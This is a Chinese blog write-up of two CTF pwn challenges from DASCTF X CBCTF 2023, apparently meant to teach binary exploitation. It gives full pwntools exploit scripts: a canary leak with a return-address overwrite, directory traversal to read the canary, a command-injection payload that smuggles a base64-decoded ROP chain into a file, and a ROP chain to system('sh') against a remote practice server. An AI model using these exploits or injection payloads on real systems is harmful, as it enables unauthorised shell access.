DASCTF X CBCTF 2023|无畏者先行 [PWN] WP

于 2024-07-10 17:20:14 发布
阅读量752 收藏 3
点赞数 16
文章标签: 安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susu_xiaosu/article/details/140329632
版权

DASCTF X CBCTF 2023|无畏者先行 [PWN] WP📌

1.GuestBook

题目保护情况 开启canary,nx保护

64位ida载入 首先可以通过输入0x18个垃圾数据可以通过打印泄露出canary

这里至多有四次输入机会每次都可以溢出,但是有00截断

程序存在后门

🔢思路:1.通过打印泄露出canary

      2.由于canary的00截断,第一溢出到返回地址并修改返回地址,(注意此时canary的末为不能为0,返回地址也有截断)

               3.第二次溢出到canary通过00截断把canary复原

EXP:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io = process('./GuestBook')
io.recvuntil(' name:')

payload = b'a'*0x10 + b'b'*0x8
#gdb.attach(io)
magic = 0x4012c3
io.sendline(payload)
io.recvuntil('\n')
canary = u64(io.recv(7).rjust(8,b'\x00'))
success('canary----->'+hex(canary))

io.recvuntil('(MAX 4):')
io.sendline('2')
payload = b'a'*0x98 + p64(canary+ord('a')) + b'a'*8 + b'\xc3\x12\x40'
gdb.attach(io)
io.sendline(payload)

payload = b'a'*0x78 + p64(canary)
#gdb.attach(io)
io.sendline(payload)

io.interactive()

2.EASYBOX

题目保护情况 同样是canary,和nx开启

64位ida载入

通过ida和运行可以看见是一个类似于shell的东西,有几个选项可以选,来一个一个分析

PING操作,可以把我们输入的东西拼接在命令里面执行并放入result.txt文件里面

但是做了过滤所以并不能直接读取flag

CAT操作,可以查看文件,这里有两个漏洞

前面知道canary存在/secret/canary.txt文件中,上面那个漏洞可以实现跨目录读取canary

🔢思路:1.通过目录穿越读取canary

     2.通过PING,把ROP链写入result.txt文件中,因为有截断,可以通过base64把rop链编码,然后通过linux命令实现base64解码

     3.通过栈溢出获取shell

EXP:

from pwn import *
import base64

context(log_level='debug',arch='amd64',os='linux')

io = remote('node5.buuoj.cn',25438)

io.sendlineafter('name:','aaaa')
io.recvuntil('/home/ctf')
payload = 'CAT'

io.sendline(payload)
io.recvuntil('view:')
payload = '../../secret/canary.txt'
io.sendline(payload)

canary = int(io.recvline(),16)
success('canary----->'+hex(canary))
pop_rdi = 0x0000000000401ce3 #: pop rdi ; ret 
system = 0x401230
sh = 0x402090
ret = 0x401C77
ROPpayload = b'a'*0x48 + p64(canary) + b'A'*8  + p64(ret) + p64(pop_rdi) + p64(sh) + p64(system)
ROPpayload = base64.b64encode(ROPpayload)

payload = b"666;echo '" + ROPpayload +b"'| base64 -d"
io.sendlineafter('/home/ctf','PING')

io.recvuntil('address:')
io.sendline(payload)

io.sendlineafter('/home/ctf','CAT')
io.sendlineafter('view:','result.txt')
io.interactive()

3.Binding

这个题目有多种解法通过下一篇单独讲解一下😖😖😖😖😖

susu_xiaosu
关注
  • 16
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1311
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
DASCTF X CBCTF 2023无畏先行
qq_61670993的博客
11-06 528
栈溢出
DASCTF X CBCTF 2023无畏先行 部分PWN
weixin_51890658的博客
10-27 372
1.GuestBook2.EASYBOX1.GuestBook开了canary,但可以泄漏canary的低1字节为0x00,把他修改为非0x00可泄漏出来(其实在泄漏的时候不用还原canary的最后一字节)有后门,可以通过strcpy函数来覆盖返回地址getshell,在这里输入2给num,循环两次,如果只循环一次是不能溢出的(因为遇到\x00会结束或覆盖到返回地址canary不会)在第一次修改返回地址为后门,在第二次修改canary的低1字节为回车,空格,\t可转为\x00恢复canary(scanf遇到
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1894
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
【Web】DASCTF X GFCTF 2024四月开启第一局 题解(全)
uuzeray的博客
04-20 2418
康好康的图片功能可以打SSRF,不能直接读本地文件,比如/etc/paswd /proc/1/environ。后来题目给了hint让打session反序列化(不是我寻思你附件也妹给session_start啊)大体思路就是先反序列化给record.php写入
DASCTF X GFCTF 2024四月开启第一局
最新发布
qq_61670993的博客
04-21 927
简单题
DASCTF X GFCTF 2022十月挑战赛
shinygod的博客
10-29 1129
Dasctf 复现
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th WriteUp
mumuzi的博客
08-02 2863
最后十分钟掉了4名可还行 只写自己做了的,队友出的就不写了 Crypto:Yusa的密码学签到——BlockTrick 不知道啥意思,反正当复读机就行了。 MISC-问卷题 DASCTF{79f3bb47a2e2d46def82c052eccb7b80}
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 5123
DASCTF Apr.2023 X SU Writeup By AheadSec
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn入门题目汇总.rar
09-01
本压缩包“pwn入门题目汇总.rar”显然是为初学者准备的一系列练习,旨在帮助他们了解和掌握pwn的基本概念和技术。 在学习pwn的过程中,首先需要理解的是计算机内存的工作原理,特别是栈、堆和全局变量的布局。栈是...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值